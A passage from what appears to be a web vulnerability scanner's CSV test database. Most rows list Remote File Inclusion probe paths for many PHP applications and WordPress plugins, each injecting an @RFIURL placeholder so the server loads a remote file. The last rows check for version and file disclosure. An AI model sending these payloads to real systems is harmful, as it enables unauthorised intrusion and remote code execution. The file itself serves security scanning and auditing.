list.\",\"\",\"\"\n\"006078\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006079\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006080\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006081\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006082\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006083\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006084\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006085\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006086\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006087\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006088\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006089\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006090\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006091\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006092\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006093\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006094\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006095\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006096\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006097\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006098\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006099\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006100\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006101\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006102\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006103\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006104\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006105\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006106\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006107\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006108\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006109\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006110\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006111\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006112\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006113\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006114\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006115\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006116\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006117\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006118\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006119\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006120\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006121\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006122\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006123\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006124\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006125\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006126\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006127\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006128\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006129\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006130\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006131\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006132\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006133\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006134\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006135\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/Flickrclient.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006136\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/help.php?LIBSDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006137\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/includes/blogger.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006138\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/includes/functions/auto_email_notify.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006139\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/includes/functions/html_generate.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006140\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/includes/functions/validations.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006141\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/index.php?LIBSDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006142\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/lib/xml/oai/ListRecords.php?xml_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006143\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/login.php?LIBSDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006144\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/logout.php?LIBSDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006145\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/lom.php?ETCDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006146\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/network_module_selector.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006147\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/submit_abuse.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006148\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/web/submit_comment.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006149\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webavis/class/class.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006150\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webavis/class/class.php?root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006151\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006152\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webnews/template.php?content_page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006153\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webroot/css.php?CONFIGS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006154\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006155\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/webyep-system/programm/webyep.php?webyep_sIncludePath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006156\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/window.php?action=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006157\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006158\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/work/index.php?g_include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006159\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/work/module/forum/forum.php?g_include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006160\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/worldpay_notify.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006161\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-cache-phase1.php?plugin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006162\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006163\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/myflash/myflash-button.php?wpPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006164\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006165\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/wordtube/wordtube-button.php?wpPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006166\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006167\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@WORDPRESSwp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006168\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/wsk/wsk.php?wsk=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006169\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/xarg_corner.php?xarg=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006170\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/xarg_corner_bottom.php?xarg=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006171\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/xarg_corner_top.php?xarg=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006172\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL&2093085906=1&995617320=2\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006173\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL?&2093085906=1&995617320=2\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006174\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/xt_counter.php?server_base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006175\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/yabbse/Sources/Packages.php?sourcedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006176\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/yacs/scripts/update_trailer.php?context[path_to_root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006177\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/yrch/plugins/metasearch/plug.inc.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006178\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ytb/cuenta/cuerpo.php?base_archivo=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006179\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/zipndownload.php?PP_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006180\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"006181\",\"\",\"3\",\"@WORDPRESSwp-content/plugins/akismet/readme.txt\",\"GET\",\"BODY:Tested up to\",\"The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version\",\"\",\"\"\n\"006182\",\"CVE-2005-4463\",\"3\",\"@WORDPRESSwp-content/plugins/hello.php\",\"GET\",\"BODY:Call to undefined function add_action\\(\\) in\",\"The WordPress hello.php plugin reveals a file system path\",\"\",\"\"\n\"006183\",\"\",\"3\",\"@WORDPRESSreadme.html\",\"GET\",\"BODY:Version&&BODY:5-minute install\",\"This WordPress file reveals the installed version.\",\"\",\"\"\n\"006184\",\"\",\"3\",\"@WORDPRESSwp-links-opml.php\",\"GET\",\"BODY:generator=\\\"WordPress\\/\",\"This WordPress script reveals the installed version.\",\"\",\"\"\n\"006185\",\"\",\"1\",\"/includes/sendmail.inc\",\"GET\",\"CODE:200&&BODY:<\\?php\",\"Include files (.inc) should not be served in plain text.\",\"\",\"\"\n\"006186\",\"\",\"1b\",\"/license.txt\",\"GET\",\"CODE:200\",\"License file found may identify site software.\",\"\",\"\"\n\"006187\",\"\",\"1b\",\"/install.txt\",\"GET\",\"CODE:200\",\"Install file found may identify site software.\",\"\",\"\"\n\"006188\",\"\",\"1b\",\"/LICENSE.TXT\",\"GET\",\"CODE:200\",\"License file found may identify site software.\",\"\",\"\"\n\"006189\",\"\",\"1b\",\"/INSTALL.TXT\",\"GET\",\"CODE:200\",\"Install file found may identify site 